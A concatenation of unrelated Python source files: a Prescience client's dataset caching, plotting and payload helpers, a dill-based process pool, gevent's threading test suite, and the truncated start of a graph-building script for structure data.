:param test_part: clean only the test part and not the default train part
"""
datasetid_path = self.cache_dataset_fold_get_full_path(
dataset_id=dataset_id,
fold_number=fold_number,
test_part=test_part
)
if os.path.exists(datasetid_path):
shutil.rmtree(datasetid_path)
def cache_clean_dataset(self, dataset_id: str, test_part: bool):
"""
Clean the local cache data of the given dataset
:param dataset_id: the dataset id
:param test_part: clean only the test part and not the default train part
"""
datasetid_path = self.cache_dataset_get_full_path(dataset_id=dataset_id, test_part=test_part)
if os.path.exists(datasetid_path):
shutil.rmtree(datasetid_path)
def cache_clean_source(self, source_id: str):
"""
Clean the local cache data of the given source
:param source_id: the source id
"""
sourceid_path = self.cache_source_get_full_path(source_id=source_id)
if os.path.exists(sourceid_path):
shutil.rmtree(sourceid_path)
def update_cache_fold(self, dataset_id, fold_number: int, test_part: bool):
"""
Request for locally caching the data of the wanted fold of a dataset.
If the local fold data are already up to date, it will do nothing.
:param dataset_id: The dataset id of the wanted fold
:param fold_number: The fold number
:param test_part: select only the test part of the dataset instead of the default train part
:return: Return the directory in which dataset data are locally saved
"""
fold_path = self.cache_dataset_fold_get_full_path(
dataset_id=dataset_id,
fold_number=fold_number,
test_part=test_part
)
if test_part:
expected_files = self.get_list_dataset_fold_test_files(dataset_id=dataset_id, fold_number=fold_number)
else:
expected_files = self.get_list_dataset_fold_train_files(dataset_id=dataset_id, fold_number=fold_number)
if os.path.exists(fold_path) and set(os.listdir(fold_path)) == set(expected_files):
print(f'Cache for fold {fold_number} of dataset \'{dataset_id}\' is already up to date on {fold_path}')
else:
self.cache_clean_fold(dataset_id=dataset_id, fold_number=fold_number, test_part=test_part)
print(f'Updating cache for source \'{dataset_id}\' : {fold_path}')
self.download_fold(
dataset_id=dataset_id,
fold_number=fold_number,
output_directory=fold_path,
test_part=test_part
)
return fold_path
def update_cache_dataset(self, dataset_id, test_part: bool) -> str:
"""
Request for locally caching the data of the wanted dataset.
If the local dataset data are already up to date, it will do nothing.
:param dataset_id: The wanted dataset id
:param test_part: select only the test part of the dataset instead of the default train part
:return: Return the directory in which dataset data are locally saved
"""
datasetid_path = self.cache_dataset_get_full_path(dataset_id=dataset_id, test_part=test_part)
if test_part:
expected_files = self.get_list_dataset_test_files(dataset_id=dataset_id)
else:
expected_files = self.get_list_dataset_train_files(dataset_id=dataset_id)
if os.path.exists(datasetid_path) and set(os.listdir(datasetid_path)) == set(expected_files):
print(f'Cache for dataset \'{dataset_id}\' is already up to date on {datasetid_path}')
else:
self.cache_clean_dataset(dataset_id=dataset_id, test_part=test_part)
print(f'Updating cache for source \'{dataset_id}\' : {datasetid_path}')
self.download_dataset(dataset_id=dataset_id, output_directory=datasetid_path, test_part=test_part)
return datasetid_path
def update_cache_source(self, source_id) -> str:
"""
Request for locally caching the data of the wanted source.
If the local source data are already up to date, it will do nothing.
:param source_id: The wanted source id
:return: Return the directory in which source data are locally saved
"""
sourceid_path = self.cache_source_get_full_path(source_id=source_id)
expected_files = self.get_list_source_files(source_id=source_id)
if os.path.exists(sourceid_path) and set(os.listdir(sourceid_path)) == set(expected_files):
print(f'Cache for source \'{source_id}\' is already up to date on {sourceid_path}')
else:
self.cache_clean_source(source_id=source_id)
print(f'Updating cache for source \'{source_id}\' : {sourceid_path}')
self.download_source(source_id=source_id, output_directory=sourceid_path)
return sourceid_path
def source_dataframe(self, source_id, index_column: str = None):
"""
Update source local cache for the given source and return the pandas dataframe for this source
:param source_id: the wanted source
:return:
"""
source_data_path = self.update_cache_source(source_id=source_id)
df = pandas.read_parquet(path=source_data_path)
if index_column is not None:
df = df.set_index(index_column)
df = df.set_index(index_column)
return df
def dataset_dataframe(self, dataset_id: str, test_part: bool):
"""
Update dataset local cache for the given dataset and return the pandas dataframe for this dataset
:param dataset_id: the wanted dataset
:param test_part: select only the test part of the dataset instead of the default train part
:return:
"""
dataset_data_path = self.update_cache_dataset(dataset_id=dataset_id, test_part=test_part)
if test_part:
# Concatenate all csv test files and create a single dataframe
only_csv = [x for x in os.listdir(dataset_data_path) if x.endswith('.csv')]
all_csv_path = [os.path.join(dataset_data_path, x) for x in only_csv]
all_csv_dataframe = [pandas.read_csv(x) for x in all_csv_path]
return pandas.concat(all_csv_dataframe)
else:
return pandas.read_parquet(path=dataset_data_path)
def fold_dataframe(self, dataset_id: str, fold_number: int, test_part: bool):
"""
Update dataset local cache for the given dataset and return the pandas dataframe for the wanted file
:param dataset_id: the wanted dataset
:param fold_number: The wanted fold number
:param test_part: select only the test part of the dataset instead of the default train part
:return:
"""
fold_path = self.update_cache_fold(dataset_id=dataset_id, fold_number=fold_number, test_part=test_part)
return pandas.read_parquet(path=fold_path)
def plot_source(self,
source_id: str,
x: str = None,
y: str = None,
kind: str = None,
clss: str = None,
block=False):
"""
Plot a wanted source data
:param source_id: the wanted source id
:param x: the name of the column to use as x
:param y: the name of the column to use as y
:param kind: the kind of the plot
:param block: should block until user close the window
:param clss: the name of the category column if any (i.e class or label)
"""
if kind is None and clss is None:
kind = 'line'
if kind is None and clss is not None:
kind = 'scatter'
dataframe = self.source_dataframe(source_id=source_id)
if x is not None:
dataframe = dataframe.sort_values(by=[x])
if clss is not None:
self._plot_dataframe_with_class(dataframe=dataframe, clss=clss, kind=kind, x=x, y=y)
else:
dataframe.plot(x=x, y=y, kind=kind)
matplotlib.pyplot.show(block=block)
@classmethod
def _plot_dataframe_with_class(cls, dataframe: pandas.DataFrame, clss: str, kind: str, x: str, y: str):
available_columns = [x for x in dataframe.columns]
if x not in available_columns:
raise PrescienceClientException(
Exception(f'Given x value \'{x}\' is not present in columns list {str(available_columns)}'))
if y not in available_columns:
raise PrescienceClientException(
Exception(f'Given x value \'{y}\' is not present in columns list {str(available_columns)}'))
available_colors = ['mediumseagreen', 'steelblue', 'tomato', 'DarkOrange', 'darkmagenta', 'darkviolet']
clss_value = dataframe[clss].unique().tolist()
clss_color = {v: available_colors[index % len(available_colors)] for index, v in enumerate(clss_value)}
ax = None
for clss_name in clss_value:
df = dataframe[dataframe[clss] == clss_name]
if ax:
ax = df.plot(x=x, y=y, kind=kind, label=clss_name, color=clss_color[clss_name], ax=ax)
else:
ax = df.plot(x=x, y=y, kind=kind, label=clss_name, color=clss_color[clss_name])
def plot_dataset(self,
dataset_id: str,
plot_train: bool = True,
plot_test: bool = True,
fold_number: int = None,
x: str = None,
y: str = None,
clss: str = None,
block=False):
"""
Plot a wanted dataset data
:param dataset_id: the wanted dataset id
:param plot_train: should plot the 'train' part
:param plot_test: should plot the 'test' part
:param fold_number: Number of the fold to plot (if unset it will plot the whole dataset)
:param block: should block until user close the window
:param x: the name of the column to use as x (for a timeseries forecast it will by default take de time column)
:param y: the name of the column to use as y (for a timeseries forecast it will by default take all the remaining columns)
:param clss: the name of the category column if any (i.e class or label)
"""
dataset = self.dataset(dataset_id=dataset_id)
problem_type = dataset.problem_type()
if plot_train:
if fold_number is None:
df_train = self.dataset_dataframe(dataset_id=dataset_id, test_part=False)
else:
df_train = self.fold_dataframe(dataset_id=dataset_id, fold_number=fold_number, test_part=False)
else:
df_train = None
if plot_test:
if fold_number is None:
df_test = self.dataset_dataframe(dataset_id=dataset_id, test_part=True)
else:
df_test = self.fold_dataframe(dataset_id=dataset_id, fold_number=fold_number, test_part=True)
else:
df_test = None
if problem_type == ProblemType.TIME_SERIES_FORECAST:
time_column = dataset.get_time_column_id()
transformed_timecolumn = dataset.get_feature_target_map().get(time_column)
if transformed_timecolumn is not None and plot_train:
if len(transformed_timecolumn) == 1:
time_column = transformed_timecolumn[-1]
else:
time_column = [x for x in transformed_timecolumn if x.endswith('_ts')][-1]
index_column = time_column
if df_train is not None:
df_train = df_train.set_index(index_column)
df_train = df_train.rename(columns={i: f'{i}_train' for i in list(df_train.columns)})
else:
df_train = pandas.DataFrame({})
if df_test is not None:
df_test = df_test.set_index(index_column)
df_test = df_test.rename(columns={i: f'{i}_test' for i in list(df_test.columns)})
else:
df_test = pandas.DataFrame({})
df_final = pandas.concat([df_train, df_test], axis='columns', sort=True)
df_final.plot()
else:
df_final = pandas.concat([df_train, df_test])
self._plot_dataframe_with_class(dataframe=df_final, clss=clss, kind='scatter', x=x, y=y)
matplotlib.pyplot.show(block=block)
def plot_evaluations(self, dataset_id: str, scoring_metric: ScoringMetric, forecasting_horizon_steps: str = None,
forecasting_discount: str = None):
"""
Plot the evolution of evaluation result scoring metrics for a given dataset
:param dataset_id: The related dataset ID
:param scoring_metric: The scoring metric to display
:param forecasting_horizon_steps: The forecasting_horizon_steps to filter on (if needed)
:param forecasting_discount: The forecasting_discount to filter on (if needed)
:return:
"""
evalution_results_page = self.get_evaluation_results(
dataset_id=dataset_id,
forecasting_horizon_steps=forecasting_horizon_steps,
forecasting_discount=forecasting_discount
)
metric_serie = [1 - x.costs().get(str(scoring_metric)) for x in evalution_results_page.content]
df = pandas.DataFrame(index=[x for x in range(len(metric_serie))], data={
str(scoring_metric): metric_serie
})
df.plot()
matplotlib.pyplot.show(block=True)
def generate_serving_payload(self, from_data, model_id: str, output=None) -> str:
"""
Generate a serving payload for a prescience model
:param from_data: integer value indicating the index of the data for classification/regression or the value of the time column for a TS.
In case this value if None, it will trigger the interactive mode for fill all requested fields
:param model_id: The model ID to generate a payload for
:param output: The outfile path in with the json payload will be saved
:return:
"""
model = self.model(model_id)
payload = model.get_model_evaluation_payload(arguments={})
evaluator = payload.get_evaluator()
problem_type = evaluator.get_problem_type()
if from_data is None:
# Fill the payload with full interactiv mode
if problem_type == ProblemType.TIME_SERIES_FORECAST:
final_dict = evaluator.interactiv_ts_forecast_payload()
else:
final_dict = evaluator.interactiv_default_payload()
else:
# Try to parse from_data to int
try:
from_data = int(from_data)
except: # pylint: disable=bare-except
pass
# Fill the payload from the data
source_id = model.source_id()
df = self.source_dataframe(source_id=source_id)
if problem_type == ProblemType.TIME_SERIES_FORECAST:
time_feature = evaluator.get_time_feature_name()
max_steps = evaluator.get_max_steps()
filtered = df.set_index(time_feature).truncate(after=from_data).tail(max_steps).reset_index()
final_dict = dataframe_to_dict_series(filtered)
else:
final_dict = df.ix[from_data].to_dict()
label_name = evaluator.get_label()
final_dict.pop(label_name)
# In some case numpy types are not serializable
def default(o):
if isinstance(o, numpy.int64): return int(o)
if isinstance(o, numpy.int32): return int(o)
raise TypeError
default_output = self.get_default_json_ouput()
full_output = Option(output) \
.get_or_else(default_output)
print(f'Saving json into `{full_output}`')
with io.open(full_output, 'w', encoding='utf8') as outfile:
json.dump(final_dict, outfile, indent=4, default=default)
return full_output
def get_roc_curve_dataframe(self, model_id: str) -> pandas.DataFrame:
metric = self.model_metric(model_id)
roc_dict = metric.json_dict['roc']
if roc_dict is None:
raise PrescienceException(Exception(f"Unsupported method for model {model_id}."))
return pandas.DataFrame({'fpr': roc_dict.get('fpr'), 'tpr': roc_dict.get('tpr')})
def plot_roc_curve(self, model_id: str, block: bool = False):
df = self.get_roc_curve_dataframe(model_id=model_id)
df.plot(x='fpr', y='tpr', kind='area')
matplotlib.pyplot.show(block=block)
def get_confusion_matrix(self, model_id: str) -> pandas.DataFrame:
"""
Create the pandas Dataframe of the confusion matrix for a given model
:param model_id: The model ID
:return: A new instance of pandas.Dataframe
"""
metric = self.model_metric(model_id)
confusion_matrix_dict = metric.json_dict['confusion_matrix']
if confusion_matrix_dict is None:
raise PrescienceException(Exception(f"Unsupported method for model {model_id}."))
columns_names = set()
row_names = set()
tab_dict = {}
for column_name, row in confusion_matrix_dict.items():
for row_name, value in row.items():
columns_names.add(column_name)
row_names.add(row_name)
if not tab_dict.get(column_name):
tab_dict[column_name] = {}
tab_dict[column_name][row_name] = value
columns_names = list(columns_names)
columns_names.sort()
row_names = list(row_names)
row_names.sort()
final_dict = {}
for column_name in columns_names:
for row_name in row_names:
if not final_dict.get(column_name):
final_dict[column_name] = []
final_dict[column_name].append(tab_dict[column_name][row_name])
return pandas.DataFrame(data=final_dict, index=row_names)
def get_metric_scores_dataframe(self, model_id) -> pandas.DataFrame:
"""
Create the pandas Dataframe containing all metrics for a given model
:param model_id: The model ID
:return: A new instance of pandas.Dataframe
"""
metric = self.model_metric(model_id)
scores = metric.json_dict['scores']
columns_names = set()
row_names = set()
tab_dict = {}
for _, row in scores.items():
column_name = row.get('type')
row_name = row.get('label') or 'global'
value = row.get('value')
if column_name and row_name and value:
row_names.add(row_name)
columns_names.add(column_name)
if not tab_dict.get(column_name):
tab_dict[column_name] = {}
tab_dict[column_name][row_name] = value
columns_names = list(columns_names)
columns_names.sort()
row_names = list(row_names)
row_names.sort()
final_dict = {}
for column_name in columns_names:
for row_name in row_names:
if not final_dict.get(column_name):
final_dict[column_name] = []
value_to_append = (tab_dict.get(column_name) or {}).get(row_name) or ''
final_dict[column_name].append(value_to_append)
return pandas.DataFrame(data=final_dict, index=row_names)
def get_default_json_ouput(self):
payload_directory = self \
.config() \
.get_or_create_cache_payload_directory()
full_output = os.path.join(payload_directory, 'payload.json')
return full_output
def generate_payload_dict_for_model(self,
model_id: str,
payload_json: str = None,
from_data=None):
if payload_json is None:
payload_json = self.generate_serving_payload(from_data, model_id)
else:
payload_json = payload_json.strip()
if len(payload_json) > 0 and payload_json[0] == '{' and payload_json[-1] == '}':
# In this case the user gives us a json string
payload_dict = json.loads(payload_json)
elif os.path.isfile(payload_json):
# In this case it is probably a path
with io.open(payload_json, 'r') as stream:
payload_dict = json.load(stream)
else:
payload_dict = json.loads('{}')
return payload_dict
|
multiprocesses.py
|
from multiprocessing.managers import BaseManager
from multiprocessing import Process, JoinableQueue
from time import sleep
import os
import signal
import dill
class ProcessPool:
"""
Class which enables multiprocess calls to custom functions
"""
class Shared:
"""
Object shared between processes. Sync'd by the BaseManager
"""
def __init__(self):
self.clear()
def get(self):
return self.data
def add(self, val):
self.data.append(val)
def clear(self):
self.data = []
def __init__(self, processes_count, *args, **kwargs):
self.sleep_length = 2
self.processes_count = processes_count
self.queue_jobs = JoinableQueue()
self.processes = []
BaseManager.register('Shared', self.Shared)
self.manager = BaseManager()
self.manager.start()
self.shared = self.manager.Shared()
for i in range(self.processes_count):
p = Process(target=self.make_pool_call)
p.id = i
p.start()
self.processes.append(p)
def make_pool_call(self):
while True:
item_pickled = self.queue_jobs.get()
if item_pickled is None:
self.queue_jobs.task_done()
break
item = dill.loads(item_pickled)
call = item.get('call')
args = item.get('args')
kwargs = item.get('kwargs')
try:
result = call(*args, **kwargs)
self.shared.add(result)
except Exception as e:
import traceback
traceback.print_exc()
os.kill(os.getpid(), signal.SIGUSR1)
self.queue_jobs.task_done()
def add_job(self, job):
"""
:param: job: has to be a dilled dict:
{
'call': function_to_be_called_by_process,
'args': [],
'kwargs': {},
}
"""
self.queue_jobs.put(job)
def finish_pool_queue(self):
while self.queue_jobs.qsize() > 0:
sleep(self.sleep_length)
for i in range(self.processes_count):
self.queue_jobs.put(None)
self.queue_jobs.join()
self.queue_jobs.close()
for p in self.processes:
p.join()
del self.processes[:]
def get_pool_results(self):
return self.shared.get()
def clear_pool_results(self):
self.shared.clear()
|
test_threading_2.py
|
# testing gevent's Event, Lock, RLock, Semaphore, BoundedSemaphore with standard test_threading
from __future__ import with_statement
setup_ = '''from gevent import monkey; monkey.patch_all()
from gevent.event import Event
from gevent.lock import RLock, Semaphore, BoundedSemaphore
from gevent.thread import allocate_lock as Lock
import threading
threading.Event = Event
threading.Lock = Lock
threading.RLock = RLock
threading.Semaphore = Semaphore
threading.BoundedSemaphore = BoundedSemaphore
if not hasattr(threading, 'current_thread'):
threading.current_thread = threading.currentThread
if not hasattr(threading.Thread, 'name'):
threading.Thread.name = property(lambda self: self.getName())
if not hasattr(threading.Thread, 'is_alive'):
threading.Thread.is_alive = threading.Thread.isAlive
if not hasattr(threading.Thread, 'daemon'):
threading.Thread.daemon = property(threading.Thread.isDaemon, threading.Thread.setDaemon)
if not hasattr(threading._Condition, 'notify_all'):
threading._Condition.notify_all = threading._Condition.notifyAll
'''
exec setup_
setup_3 = '\n'.join(' %s' % line for line in setup_.split('\n'))
setup_4 = '\n'.join(' %s' % line for line in setup_.split('\n'))
setup_5 = '\n'.join(' %s' % line for line in setup_.split('\n'))
import test.test_support
from test.test_support import verbose
import random
import re
import sys
import threading
import thread
import time
import unittest
import weakref
import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assert_(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>" % i, self, sema, mutex, numrunning)
threads.append(t)
if hasattr(t, 'ident'):
self.failUnlessEqual(t.ident, None)
self.assert_(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.is_alive())
if hasattr(t, 'ident'):
self.failIfEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assert_(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
if sys.version_info[:2] > (2, 5):
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def SKIP_test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
worker_started.wait()
if verbose:
print " verifying worker hasn't exited"
self.assert_(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
if sys.version_info[:2] > (2, 5):
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
if sys.version_info[:2] > (2, 5):
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
%s
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""" % setup_4])
self.assertEqual(rc, 42)
if sys.version_info[:2] > (2, 5):
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
import subprocess
p = subprocess.Popen([sys.executable, "-c", """if 1:
%s
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
""" % setup_5],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
stdout = stdout.strip()
assert re.match('^Woke up, sleep function is: <.*?sleep.*?>$', stdout), repr(stdout)
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
if sys.version_info[:2] > (2, 5):
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another': self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEquals(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEquals(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
class ThreadJoinOnShutdown(unittest.TestCase):
def _run_and_join(self, script):
script = """if 1:
%s
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" % setup_3 + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
self.failIf(rc == 2, "interpreter was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
# skip disable because I think the bug shouldn't apply to gevent -- denis
#if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'os2emx'):
# print >>sys.stderr, ('Skipping test_3_join_in_forked_from_thread'
# ' due to known OS bugs on'), sys.platform
# return
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
class ThreadingExceptionTests(unittest.TestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
def main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
main()
|
graph_maker.py
|
import os, time, multiprocessing, math, random, torch, h5py, glob
from simPDF_xyz import *
from mendeleev import element
import numpy as np
import pandas as pd
import networkx as nx
from tqdm import tqdm
from shutil import copyfile
from diffpy.srreal.overlapcalculator import OverlapCalculator
from diffpy.srreal.pdfcalculator import DebyePDFCalculator
from diffpy.Structure import loadStructure
from norm_space import define_space
from sampleSphere import sampleSphere
import matplotlib.pyplot as plt
from plot_structure import plot_structure
torch.manual_seed(12)
random.seed(12)
np.random.seed(12)
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['MKL_DYNAMIC'] = 'FALSE'
def getMinMaxVals(norm, nFiles, maxDist):
print(norm)
df = pd.read_csv(norm)
df = df.sample(frac=1, random_state=42).reset_index(drop=True)
files = []
atomMin = 99
atomMax = 0
minDist = 0
maxDist = maxDist # Largest distance in all structures
for index, row in df.iterrows():
if index == nFiles:
break
namePh = row[row.index[0]]
files.append(namePh[:-4])
if atomMin > row['Atom min']:
atomMin = row['Atom min']
if row['Atom max'] > atomMax:
atomMax = row['Atom max']
#if minDist > row['Edge dist min']:
# minDist = np.amin([row['Edge dist min']])
#if row['Edge dist max'] > maxDist:
# maxDist = np.amax(np.amax([row['Edge dist max']]))
return atomMin, atomMax, minDist, maxDist, files
def transformers(edges,eFeatures,nNodes, normMin, normMax, deadVal):
""" Obtain source and sink node transformer matrices"""
softAdj = torch.sparse.FloatTensor(edges,eFeatures,(nNodes,nNodes))
softAdj = softAdj.to_dense()
for i in range(nNodes):
for j in range(i,nNodes):
if softAdj[i][j] != 0.:
softAdj[i][j] = normFeatures(softAdj[i][j], normMin, normMax)
else:
if i == j and softAdj[0][j] != deadVal:
softAdj[i][j] = 0
elif i == j:
softAdj[i][j] = 0.5*deadVal # Diagonal is added to itself
else:
softAdj[i][j] = deadVal
softAdj += softAdj.T
return softAdj
def makeData(data_path, xyzPath, norm, nNodes=100, nFiles=100, loadPDF=False, test_set_ratio=0.2, deadVal=-1, minDist=0 ,maxDist=100):
start_time = time.time()
"""
Input: Directory with .txt files
